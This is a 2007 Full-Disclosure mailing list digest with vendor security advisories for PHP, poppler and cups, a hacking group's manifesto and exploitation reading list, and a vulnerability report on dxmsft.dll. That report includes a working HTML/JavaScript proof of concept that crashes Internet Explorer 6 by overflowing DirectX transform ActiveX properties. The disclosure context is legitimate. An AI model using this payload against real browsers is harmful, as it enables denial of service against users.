To: security-announce () lists rpath com,
update-announce () lists rpath com, product-announce () lists rpath com
Cc: lwn () lwn net, full-disclosure () lists grok org uk,
vulnwatch () vulnwatch org, bugtraq () securityfocus com
Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply () rpath com>
Content-Type: text/plain; charset=us-ascii
rPath Security Advisory: 2007-0242-1
Published: 2007-11-19
Products:
rPath Appliance Platform Linux Service 1
rPath Linux 1
Rating: Minor
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
php5=conary.rpath.com () rpl:1/5.2.5-1-1
php5-cgi=conary.rpath.com () rpl:1/5.2.5-1-1
php5-mysql=conary.rpath.com () rpl:1/5.2.5-1-1
php5-pear=conary.rpath.com () rpl:1/5.2.5-1-1
php5-pgsql=conary.rpath.com () rpl:1/5.2.5-1-1
php5-soap=conary.rpath.com () rpl:1/5.2.5-1-1
php5-xsl=conary.rpath.com () rpl:1/5.2.5-1-1
rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1943
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900
Description:
Previous versions of the php5 package contain multiple
vulnerabilities,
the most serious of which involve several Denial of Service
attacks
(application crashes and temporary application hangs). It is
not
currently known that these vulnerabilities can be exploited to
execute
malicious code.
In its default configuration, rPath Linux 1 does not install
php5 and
is thus not vulnerable; however, systems upon which php5 and
an exposed
application have been installed may be vulnerable.
http://wiki.rpath.com/Advisories:rPSA-2007-0242
Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-
license.html
------------------------------
Message: 7
Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: [Full-disclosure] Multiple stack-based buffer overflows
in
dxmsft.dll
To: "full-disclosure () lists grok org uk"
<full-disclosure () lists grok org uk>
Message-ID:
<30247048.1195511432439.JavaMail.root () elwamui-
norfolk.atl.sa.earthlink.net>
Content-Type: text/plain; charset=UTF-8
There are multiple stack overflows in dxmsft.dll version
6.3.2900.3199(Image DirectX Transforms). This DLL exposes DirectX
Image Transform objects which are safe for scripting. The issue is
with the Color property of certain objects, so I am assuming this
property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested
this on
IE7 and it does not appear to affect Windows Server 2003 R2
SP2(newer version of the dxmsft.dll). I have not tested code
execution, though it may be possible. I received the following
response from Microsoft:
---
From our investigation this issue was found to be a stability
problem which is not exploitable. The net effect of this issue is
that IE will become unresponsive. The underlying operating system
will still respond and Killing the process will stop the local
DoS.
---
It did not hang IE on my machine, but instead crashed IE with a
stack overflow.
This may be related to http://www.securityfocus.com/bid/19029/.
PoC as follows:
---------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new
ActiveXObject("DXImageTransform.Microsoft.Chroma");
obj.color = s;
var obj = new
ActiveXObject("DXImageTransform.Microsoft.DropShadow");
obj.color = s;
var obj = new
ActiveXObject("DXImageTransform.Microsoft.Glow");
obj.color = s;
var obj = new
ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
obj.color = s;
var obj = new
ActiveXObject("DXImageTransform.Microsoft.Shadow");
obj.color = s;
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
---------------------
Elazar
------------------------------
Message: 8
Date: Mon, 19 Nov 2007 19:12:41 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler
packages fix vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIbR-0008H5-79 () artemis annvix ca>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
__________________________________________________________________
_____
Mandriva Linux Security Advisory MDKSA-
2007:227
http://www.mandriva.com/security/
__________________________________________________________________
_____
Package : poppler
Date : November 19, 2007
Affected: 2007.1, 2008.0, Corporate 4.0
__________________________________________________________________
_____
Problem Description:
Alin Rad Pop found several flaws in how PDF files are handled
in poppler. An attacker could create a malicious PDF file that
would cause poppler to crash or potentially execute arbitrary
code
when opened.
The updated packages have been patched to correct this issue.
__________________________________________________________________
_____
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
__________________________________________________________________
_____
Updated Packages:
Mandriva Linux 2007.1:
9f040875778bb940669bd2bfdbef248c 2007.1/i586/libpoppler-qt1-
0.5.4-3.3mdv2007.1.i586.rpm
804046d0a838cb3a0a5e355fb118b1bc 2007.1/i586/libpoppler-qt1-
devel-0.5.4-3.3mdv2007.1.i586.rpm
dd83d0b61f2ad91ea79f314752a0f514 2007.1/i586/libpoppler-qt4-1-
0.5.4-3.3mdv2007.1.i586.rpm
05d0deb14ec5dad80d8d400756b3d183 2007.1/i586/libpoppler-qt4-1-
devel-0.5.4-3.3mdv2007.1.i586.rpm
a23fb37129c8756e353fe47be6d6a8be 2007.1/i586/libpoppler1-0.5.4-
3.3mdv2007.1.i586.rpm
6db198b349d7ebe355d809732ddb21bb 2007.1/i586/libpoppler1-devel-
0.5.4-3.3mdv2007.1.i586.rpm
3e280873492799bebdec28872351052e 2007.1/i586/poppler-0.5.4-
3.3mdv2007.1.i586.rpm
40600d9ccb1e7f7a76cb4ccf447e9e40 2007.1/SRPMS/poppler-0.5.4-
3.3mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
b49094eb08c809397081d357f7251166 2007.1/x86_64/lib64poppler-qt1-
0.5.4-3.3mdv2007.1.x86_64.rpm
e6f52d8bb5d9f84458ae6892cd7800da 2007.1/x86_64/lib64poppler-qt1-
devel-0.5.4-3.3mdv2007.1.x86_64.rpm
4d08d7343c94a016928cef93490af098 2007.1/x86_64/lib64poppler-qt4-
1-0.5.4-3.3mdv2007.1.x86_64.rpm
b0f8d4b4c5f1917c61687900a119e685 2007.1/x86_64/lib64poppler-qt4-
1-devel-0.5.4-3.3mdv2007.1.x86_64.rpm
0955492bd1319fdc2e74c2528994e2bc 2007.1/x86_64/lib64poppler1-
0.5.4-3.3mdv2007.1.x86_64.rpm
f918b50ec88a2aca954c156c33c605e8 2007.1/x86_64/lib64poppler1-
devel-0.5.4-3.3mdv2007.1.x86_64.rpm
24fdcc57f5c7481e6732f45e43e49d51 2007.1/x86_64/poppler-0.5.4-
3.3mdv2007.1.x86_64.rpm
40600d9ccb1e7f7a76cb4ccf447e9e40 2007.1/SRPMS/poppler-0.5.4-
3.3mdv2007.1.src.rpm
Mandriva Linux 2008.0:
840730bb310636d43a3d07a6d4d4f281 2008.0/i586/libpoppler-devel-
0.6-3.1mdv2008.0.i586.rpm
9d6109683ae8729ad549c56d2f8998c1 2008.0/i586/libpoppler-glib-
devel-0.6-3.1mdv2008.0.i586.rpm
b69e7e912fe2f532c5a9ed7c3687eb42 2008.0/i586/libpoppler-glib2-
0.6-3.1mdv2008.0.i586.rpm
cea89e4b36cbe99060e3568038474078 2008.0/i586/libpoppler-qt-devel-
0.6-3.1mdv2008.0.i586.rpm
64a459904bf417570e4f2b8e0d550c77 2008.0/i586/libpoppler-qt2-0.6-
3.1mdv2008.0.i586.rpm
5d1c9970275811b934599f95b5264d7d 2008.0/i586/libpoppler-qt4-2-
0.6-3.1mdv2008.0.i586.rpm
7bbfdb4209d40f503bedc8e10e4687df 2008.0/i586/libpoppler-qt4-
devel-0.6-3.1mdv2008.0.i586.rpm
812e34a9b25b4e28169bf84804da8325 2008.0/i586/libpoppler2-0.6-
3.1mdv2008.0.i586.rpm
57380d8dcef7e2b404ed6a7571969bfe 2008.0/i586/poppler-0.6-
3.1mdv2008.0.i586.rpm
697118d63ace272626e64555f7b8cffd 2008.0/SRPMS/poppler-0.6-
3.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
f64a05a64b742ac4a40a07b8c43b9545 2008.0/x86_64/lib64poppler-
devel-0.6-3.1mdv2008.0.x86_64.rpm
5d9963749a1315a570e9a70783c078da 2008.0/x86_64/lib64poppler-glib-
devel-0.6-3.1mdv2008.0.x86_64.rpm
8d62d129c9279da1ed306a02785d5a7f 2008.0/x86_64/lib64poppler-
glib2-0.6-3.1mdv2008.0.x86_64.rpm
f844c25e098d3b295cba161a07795b36 2008.0/x86_64/lib64poppler-qt-
devel-0.6-3.1mdv2008.0.x86_64.rpm
5bfdd34b678a33aeebeec9dc7b0d0dd7 2008.0/x86_64/lib64poppler-qt2-
0.6-3.1mdv2008.0.x86_64.rpm
83334372f43c893ca9afdaefdd7b90d0 2008.0/x86_64/lib64poppler-qt4-
2-0.6-3.1mdv2008.0.x86_64.rpm
82099121bfc50561cb3a175d9d31152b 2008.0/x86_64/lib64poppler-qt4-
devel-0.6-3.1mdv2008.0.x86_64.rpm
59a614072521db19cd3b502e6d49959a 2008.0/x86_64/lib64poppler2-0.6-
3.1mdv2008.0.x86_64.rpm
0a5a8795e93dc014c5f07e2ab6e73393 2008.0/x86_64/poppler-0.6-
3.1mdv2008.0.x86_64.rpm
697118d63ace272626e64555f7b8cffd 2008.0/SRPMS/poppler-0.6-
3.1mdv2008.0.src.rpm
Corporate 4.0:
86be8a80003ab4c7a36905eac276dbf6 corporate/4.0/i586/libpoppler-
qt0-0.4.1-3.6.20060mlcs4.i586.rpm
32bae8fecaa6ec4e2b1e7e68458f889b corporate/4.0/i586/libpoppler-
qt0-devel-0.4.1-3.6.20060mlcs4.i586.rpm
e9aefa230a3c897361330d91583eb4b9 corporate/4.0/i586/libpoppler0-
0.4.1-3.6.20060mlcs4.i586.rpm
280a9f7aea1b3766864996d5969e69ea corporate/4.0/i586/libpoppler0-
devel-0.4.1-3.6.20060mlcs4.i586.rpm
aab471f88ae46303acfef45c3464bce6 corporate/4.0/SRPMS/poppler-
0.4.1-3.6.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
62f84dc6ac78997484c76c0e34c74063
corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-
3.6.20060mlcs4.x86_64.rpm
5fda381aed07c4eaa47f48d7187449ee
corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-
3.6.20060mlcs4.x86_64.rpm
6abf5b15ba6ffa847dde37a2d0f049d0
corporate/4.0/x86_64/lib64poppler0-0.4.1-3.6.20060mlcs4.x86_64.rpm
bcbad9d141f0b9615740d5f027a24699
corporate/4.0/x86_64/lib64poppler0-devel-0.4.1-
3.6.20060mlcs4.x86_64.rpm
aab471f88ae46303acfef45c3464bce6 corporate/4.0/SRPMS/poppler-
0.4.1-3.6.20060mlcs4.src.rpm
__________________________________________________________________
_____
To upgrade automatically use MandrivaUpdate or urpmi. The
verification
of md5 checksums and GPG signatures is performed automatically
for you.
All packages are signed by Mandriva for security. You can obtain
the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
__________________________________________________________________
_____
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN
XrZ88C4TwK/FkZL+zC+zOLU=
=ehqr
-----END PGP SIGNATURE-----
------------------------------
Message: 9
Date: Mon, 19 Nov 2007 19:23:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups
packages
fix vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIlm-0008OR-55 () artemis annvix ca>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
__________________________________________________________________
_____
Mandriva Linux Security Advisory MDKSA-
2007:228
http://www.mandriva.com/security/
__________________________________________________________________
_____
Package : cups
Date : November 19, 2007
Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
__________________________________________________________________
_____
Problem Description:
Alin Rad Pop found several flaws in how PDF files are handled in
cups.
An attacker could create a malicious PDF file that would cause
cups
to crash or potentially execute arbitrary code when opened.
The updated packages have been patched to correct this issue.
__________________________________________________________________
_____
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
__________________________________________________________________
_____
Updated Packages:
Mandriva Linux 2007.0:
4fd4b6a2d384e2cc599b415131a58edd 2007.0/i586/cups-1.2.4-
1.5mdv2007.0.i586.rpm
29fd652c383d4ea688336bc143f1e5cf 2007.0/i586/cups-common-1.2.4-
1.5mdv2007.0.i586.rpm
6a6c275bf900887bc34325ef552f39ab 2007.0/i586/cups-serial-1.2.4-
1.5mdv2007.0.i586.rpm
b2f487a129a0ae8cefd66bd89177f5bd 2007.0/i586/libcups2-1.2.4-
1.5mdv2007.0.i586.rpm
853850aadbfed2e7a5fe76ddfd293990 2007.0/i586/libcups2-devel-
1.2.4-1.5mdv2007.0.i586.rpm
cdeaa28956923402a8986821fb01ec53 2007.0/i586/php-cups-1.2.4-
1.5mdv2007.0.i586.rpm
5152934e9233e36bd1308d36144bbc1c 2007.0/SRPMS/cups-1.2.4-
1.5mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64:
7df3b74de7c7d06ca7e750912993b85a 2007.0/x86_64/cups-1.2.4-
1.5mdv2007.0.x86_64.rpm
7c8463926c7a618df34b5e31ddb3b80f 2007.0/x86_64/cups-common-1.2.4-
1.5mdv2007.0.x86_64.rpm
49b51564f1e7ce0df1da99f7f86bff3c 2007.0/x86_64/cups-serial-1.2.4-
1.5mdv2007.0.x86_64.rpm
e6c50f4ec69f14569036549ee1402beb 2007.0/x86_64/lib64cups2-1.2.4-
1.5mdv2007.0.x86_64.rpm
0d4f42989dc3604a551cf1f9f4bb1c76 2007.0/x86_64/lib64cups2-devel-
1.2.4-1.5mdv2007.0.x86_64.rpm
8a9a47b66a117d76b6612ac247ee76fb 2007.0/x86_64/php-cups-1.2.4-
1.5mdv2007.0.x86_64.rpm
5152934e9233e36bd1308d36144bbc1c 2007.0/SRPMS/cups-1.2.4-
1.5mdv2007.0.src.rpm
Mandriva Linux 2007.1:
8bca1f69b483c9907b164d090bf71161 2007.1/i586/cups-1.2.10-
2.3mdv2007.1.i586.rpm
8d84223e130eb9039dd5e25dfcf47684 2007.1/i586/cups-common-1.2.10-
2.3mdv2007.1.i586.rpm
c73459d19f605e2093fe8e7753510cf8 2007.1/i586/cups-serial-1.2.10-
2.3mdv2007.1.i586.rpm
9f4e634eb3e900ffefd59562780a3f28 2007.1/i586/libcups2-1.2.10-
2.3mdv2007.1.i586.rpm
fd0883a8e8243ff1ceb862f14b9f032b 2007.1/i586/libcups2-devel-
1.2.10-2.3mdv2007.1.i586.rpm
bbb9b69f0e77c2e89f82328fa96a254f 2007.1/i586/php-cups-1.2.10-
2.3mdv2007.1.i586.rpm
a9694fcccc09b5fc3e0ab17acff8c857 2007.1/SRPMS/cups-1.2.10-
2.3mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
b1ae2a278de78e5e90cd818af06c8869 2007.1/x86_64/cups-1.2.10-
2.3mdv2007.1.x86_64.rpm
feb3659cf805bbb8d7d528ec00007416 2007.1/x86_64/cups-common-
1.2.10-2.3mdv2007.1.x86_64.rpm
f10bf7760a46b9bf195d0ee2f0b20ad0 2007.1/x86_64/cups-serial-
1.2.10-2.3mdv2007.1.x86_64.rpm
7dccd2d2bd22194c72821a2315be71f0 2007.1/x86_64/lib64cups2-1.2.10-
2.3mdv2007.1.x86_64.rpm
1690756e08eed05d08b9b1dad4554a69 2007.1/x86_64/lib64cups2-devel-
1.2.10-2.3mdv2007.1.x86_64.rpm
9d0f9f960a4e171d5b69a51650a0e97c 2007.1/x86_64/php-cups-1.2.10-
2.3mdv2007.1.x86_64.rpm
a9694fcccc09b5fc3e0ab17acff8c857 2007.1/SRPMS/cups-1.2.10-
2.3mdv2007.1.src.rpm
Mandriva Linux 2008.0:
fb82aaf844538f1192dc5a5bba48ebb2 2008.0/i586/cups-1.3.0-
3.3mdv2008.0.i586.rpm
0f32262c9fd557a33653d346cf561eb0 2008.0/i586/cups-common-1.3.0-
3.3mdv2008.0.i586.rpm
679603be0ff46880b67a8a526fc5e0f6 2008.0/i586/cups-serial-1.3.0-
3.3mdv2008.0.i586.rpm
2c475b6dbc51abb97f4978fb38f805aa 2008.0/i586/libcups2-1.3.0-
3.3mdv2008.0.i586.rpm
c8bfa0b793dc2f75c15f19e4822bb02d 2008.0/i586/libcups2-devel-
1.3.0-3.3mdv2008.0.i586.rpm
002037d0c0296df0f488b6827abd3621 2008.0/i586/php-cups-1.3.0-
3.3mdv2008.0.i586.rpm
81a92819ff1b95379e68d0b92022ef31 2008.0/SRPMS/cups-1.3.0-
3.3mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
908ceb359b83acc57734a535e1b7b7a5 2008.0/x86_64/cups-1.3.0-
3.3mdv2008.0.x86_64.rpm
3ef9fbbffa74d7ea35ec501c074f6195 2008.0/x86_64/cups-common-1.3.0-
3.3mdv2008.0.x86_64.rpm
b29c75dd2616451c33800772d77f6d22 2008.0/x86_64/cups-serial-1.3.0-
3.3mdv2008.0.x86_64.rpm
7bc26d62f62bebfd13f748a3e1c92f40 2008.0/x86_64/lib64cups2-1.3.0-
3.3mdv2008.0.x86_64.rpm
bd7fca05e68b64f71532007f0d3336b6 2008.0/x86_64/lib64cups2-devel-
1.3.0-3.3mdv2008.0.x86_64.rpm
f8a5c7b8727652c48080c7d42ebbbb98 2008.0/x86_64/php-cups-1.3.0-
3.3mdv2008.0.x86_64.rpm
81a92819ff1b95379e68d0b92022ef31 2008.0/SRPMS/cups-1.3.0-
3.3mdv2008.0.src.rpm
Corporate 3.0:
d8f8b23034ed04134c3adffe8900c3c0 corporate/3.0/i586/cups-1.1.20-
5.14.C30mdk.i586.rpm
692d4cc10f27d0b032414bd49047a0d5 corporate/3.0/i586/cups-common-
1.1.20-5.14.C30mdk.i586.rpm
f51f15805a46410360a735d266b05513 corporate/3.0/i586/cups-serial-
1.1.20-5.14.C30mdk.i586.rpm
ac8c8341c807fe425b95b2d36e540632 corporate/3.0/i586/libcups2-
1.1.20-5.14.C30mdk.i586.rpm
9e4381efa99b4259291d83ce12fbbfd1 corporate/3.0/i586/libcups2-
devel-1.1.20-5.14.C30mdk.i586.rpm
dbb2486013936d7ac79996b437871851 corporate/3.0/SRPMS/cups-1.1.20-
5.14.C30mdk.src.rpm
Corporate 3.0/X86_64:
af60c4b209e2d7c8b2926152484d7a16 corporate/3.0/x86_64/cups-
1.1.20-5.14.C30mdk.x86_64.rpm
04723ab4e6928c7c94509970ee3affe5 corporate/3.0/x86_64/cups-
common-1.1.20-5.14.C30mdk.x86_64.rpm
633e04aa6a1a94e4c16ff06b80c5b0a1 corporate/3.0/x86_64/cups-
serial-1.1.20-5.14.C30mdk.x86_64.rpm
8455649b95bd3ccbbbd83643355d0d9d corporate/3.0/x86_64/lib64cups2-
1.1.20-5.14.C30mdk.x86_64.rpm
b0bb5f82abe5e63f2330a2ce3856d9fd corporate/3.0/x86_64/lib64cups2-
devel-1.1.20-5.14.C30mdk.x86_64.rpm
dbb2486013936d7ac79996b437871851 corporate/3.0/SRPMS/cups-1.1.20-
5.14.C30mdk.src.rpm
Corporate 4.0:
601bc4824031861920955ad8555aa4d7 corporate/4.0/i586/cups-1.2.4-
0.5.20060mlcs4.i586.rpm
47167ce1b770bf583616d86a06e4b434 corporate/4.0/i586/cups-common-
1.2.4-0.5.20060mlcs4.i586.rpm
8b12a32bd46ce350143b1722dbf76de2 corporate/4.0/i586/cups-serial-
1.2.4-0.5.20060mlcs4.i586.rpm
7bded05fbaf5b485aef109404f0132f9 corporate/4.0/i586/libcups2-
1.2.4-0.5.20060mlcs4.i586.rpm
09c2660b9004454c07b15d3e57124acc corporate/4.0/i586/libcups2-
devel-1.2.4-0.5.20060mlcs4.i586.rpm
55eddc1759513c131465e61564977618 corporate/4.0/i586/php-cups-
1.2.4-0.5.20060mlcs4.i586.rpm
3a2b57f8a67c419bc74f09db58b6e789 corporate/4.0/SRPMS/cups-1.2.4-
0.5.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
1e3565148aa5da08a4b999b42d7763c8 corporate/4.0/x86_64/cups-1.2.4-
0.5.20060mlcs4.x86_64.rpm
a1da7ffbc6fb5294967fde1b785dc7fa corporate/4.0/x86_64/cups-
common-1.2.4-0.5.20060mlcs4.x86_64.rpm
306ffbfbf7606ffc31c197f77c539eef corporate/4.0/x86_64/cups-
serial-1.2.4-0.5.20060mlcs4.x86_64.rpm
f0364ad9115ceb82978847ab6cdc66e1 corporate/4.0/x86_64/lib64cups2-
1.2.4-0.5.20060mlcs4.x86_64.rpm
d93d6cb48d60436c9f1b32181f82b6c7 corporate/4.0/x86_64/lib64cups2-
devel-1.2.4-0.5.20060mlcs4.x86_64.rpm
802a3f4c3167f06640d2a8c3394cb26c corporate/4.0/x86_64/php-cups-
1.2.4-0.5.20060mlcs4.x86_64.rpm
3a2b57f8a67c419bc74f09db58b6e789 corporate/4.0/SRPMS/cups-1.2.4-
0.5.20060mlcs4.src.rpm
__________________________________________________________________
_____
To upgrade automatically use MandrivaUpdate or urpmi. The
verification
of md5 checksums and GPG signatures is performed automatically
for you.
All packages are signed by Mandriva for security. You can obtain
the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
__________________________________________________________________
_____
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W
z5jyh/u/+4QFVsSocymKj/g=
=RkrY
-----END PGP SIGNATURE-----
------------------------------
Message: 10
Date: Tue, 20 Nov 2007 07:09:46 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] Tha Manual.
To: full-disclosure () lists grok org uk
Message-ID: <47427A2A.5060905 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed
Tha manual.
We do not care about you, or your affilates.
We are in position, and a new army has emerged.
The first of a set of manuals, being provided as follows shall be
provided wherein those who maintain an interest in the power of
the
simplicity of man.
The Manual
Written by d4rk1v4n, part of the rchrafe crime wave.
Notes: We are the rchrafe, you are pathetic
You must learn assembly.
It must be the breakpoint for any other language, high-level or
low-level and integral learning processes.
It will be assumed that a thorough course in C Programming and
Assembly
must first commence.
Also after which a basic, yet thourough understanding of Logic
Gates,
which will be provided as articles following the manual.
This guide is a perfected manual, crisp with only the intent to
create
an army of elite.
Simply to intervene.
Mod 1: Kernel Design
{
Operating System Concepts Chapters 1-3 5-13
Linux Kernel 2.4 Chapters 1-13
Shellcode
Stack Overflows
Format string exploitation
Integer Overflows
Race Conditions (files)
Kernel Exploitation (Linux)
Kernel patching (Linux)
Kernel rootkit (Linux)
linux process patching
dlmalloc exploitation (partial analysis of 6 thousand line src)
raw sockets, hping2
i/o multiplexing
pthreads
ELF executable format
OS Fingerprinting
IRC Protocol RFC
SMTP Protocol
ICMP Protocol
POP3 protocol
}
Mod 2: Algorithms & Data Structures
{
Computer Organization Hardware/Software Int. chapters 1-6
FreeBSD Design And Implementation chapters 1-6, 8, 12, 13
Algorithms And Data structures (Sedgwick, knuth, whale)
Linux TCPIP Implementation
Linux Synchronization analysis
Linux ext3 analysis
Linux kmalloc analysis
Threads
Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85)
Role Based Access Control (rsbac for linux)
Buffer overflow Protection
MIPS ASM
Computer Networks - Tanenbaum
C++ (full)
Perl
phkmalloc exploitation
advanced dlmalloc exploitation
advanced fmt string exploitation
advanced race conditions (double free, etc)
freebsd kernel exploitation
freebsd kernel rootkit
cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS)
TCP RFC
IP RFC
IPSEC RFC
DNS specification
HTTP specification
IMAP specification
SSL 3 specification
Kerberos
asynch i/o
perl exploitation
php exploitation
sql injection
win32 API
PE executable format
windows ring 3 hacks
IDA/Softice work
binary encryption
polymorphic shellcode
WIN DCOM
ONE RPC Specification
}
Mod 3: Large source analysis
{
400-500 Thousand lines of src analysis
Solaris Kernel internals book
Sparc ASM
windows kernel analysis & exploitation
Prolog
Artificial Intelligence
Compilers
SIMD
ISP Design
Database Design ISBN: 0321204484
Sysvmalloc exploitation
IOS malloc exploitation
RTL malloc exploitation
kmalloc exploitation
ATM
VPN?s
DecNet
Cryptography
Linear algebra
}
Level 4: Parallelism, Distributiveness, Diversity
{
OpenVMS Scheduler ISBN: 1555581560
OpenVMS Memory Managment ISBN: 1555581595
Real Time Scheduling Design ISBN: 0387231374
HP-UX Kernel internals ISBN: 0130328618
Distributed Operating Systems ISBN: 0132199084
VHDL ISBN: 0471899720
Verilog
Designing a MAC Model (like selinux)
Designing BOF Protection (like PAX)
Parallel Architectures
Parallel Algorithm Design
Advanced Artificial Intelligence
Alpha
PowerPC
PA-RISC
ARM
M68K
OpenVMS using
HP-UX using
Digital Image Processing
Digital Signal Processing
Electrical Engineering Basics
Circuit Board Design
}
The rchrafe will resume tutorials of the Mod 1 on the 1st of
December
2007, in the channel #crx under irc.efnet.org/pl/ru
We will not accommodate stupidity.
The key will be revealed on rchrafe.wordpress.com at midnight, the
1st
of december 2007 for all to join!
Well will rise!
------------------------------
Message: 11
Date: Tue, 20 Nov 2007 07:13:02 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] The Call to Reason
To: full-disclosure () lists grok org uk
Message-ID: <47427AEE.2060404 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed
?The Call to Reason.?
By the rhcrafe Senior seat of officials.
BEHOLD AND WITNESS, those who read this document, this which
is the official PROCLAMATION and LETTER OF INTENT concerning
the future of RCHRAFE and RCHRAFE member states; the words within
are no less than the movement of RCHRAFE from its widely
admired position in the computer underground to an overt
existence as a world renowned hacking into computer machines
authority.
REGARDING the current social state of hacking into computer
machines, RCHRAFE takes no stance. As an autonomous body
with goals unrelated to what is largely considered ?the
hacking community?, RCHRAFE recognizes no entities nor social
classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts
such as ?black hat? and ?white hat? do thus not exist in
the lexicon of RCHRAFE politics, and are irrelevant to our goals.
What then, are the goals and motivations of this powerful
force that has developed over the years, that has come
to be known as RCHRAFE? No less than the subjugation of
power in the computer machine community. It is at this
time appropriate to state COMMUNIQUE POINT NUMBER ONE:
?RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING
POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF,
A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT
ASSISTANCE OR AFFILIATION.?
It should be pointed out that although RCHRAFE has strong
ties to the American Republican Party and political
republican ideology, we do not participate actively
in government politics of any kind.
PERTAINING TO the overall goals of RCHRAFE as an organization
and the pervasive RCHRAFE social movement, we have distinct
purpose and bearing.
While RCHRAFE assimilates no political or social goals in
and of themselves, we reserve the right to voice opinion
when political or social policies or activities relate
to these aforementioned goals.
These goals, stated, comprise COMMUNIQUE POINT NUMBER
TWO:
?RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS,
MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES.?
We may surmise in corollary then, by the combined
observations of communique points one and two, that RCHRAFE
is in definition a usurping entity, and will tend to
remain benign concerning rival computer groups.
TO CONCLUDE, RCHRAFE will exist as long as the interests
of the corollaries are subject to external change. We
reserve the right to maintain the status of RCHRAFE and
the goals of the corollaries by any mean necessary, but
never by exceeding necessary means.
We Shall Rise!
------------------------------
Message: 12
Date: Tue, 20 Nov 2007 07:33:09 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
Professional ?
To: worried security <worriedsecurity () googlemail com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47427FA5.2090307 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
worried security wrote:
On Nov 17, 2007 1:08 PM, Meef <massa () iut-dhaka edu> wrote:
What are the steps to follow to become a computer security
professional ?,
Sorry, you will never make it to professionalism as you broke
the
first and most important rule.
NEVER POST ON A PUBLIC MAILING LIST!!!!
And you are here because, you are 'worried security'.
The second most important rule of becoming a security
professional is,
if you do need to post to a public mailing list then never do it
under
a .edu or .gov or official company e-mail address, we will all
just
point and laugh and have your account hi-jacked with the next
cross-site scripting flaw that gets to to the public mailing
list.
But I thought the first most important rule, which was not to be
broken,
was not to post on a security mailing list, such as this.
Kindly go through your cross-site request forgery techniques with
me,
I'm really in need of a m3nt0r
The third most important rule to becoming a security
professional is
never talk to people on public mailing lists who have broken
rule one
